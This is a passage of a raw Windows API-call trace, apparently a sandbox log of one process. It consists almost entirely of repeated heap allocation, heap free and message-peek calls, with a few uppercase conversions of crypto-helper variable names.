lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.331] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.332] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0185.332] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0185.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0185.333] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0185.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0185.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0185.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0185.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0185.334] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.334] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.334] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0185.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0185.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.335] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.335] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0185.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0185.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x3bee8d0 [0185.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bee8d0 | out: hHeap=0x970000) returned 1 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0185.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.386] HeapFree (in: hHeap=0x970000, 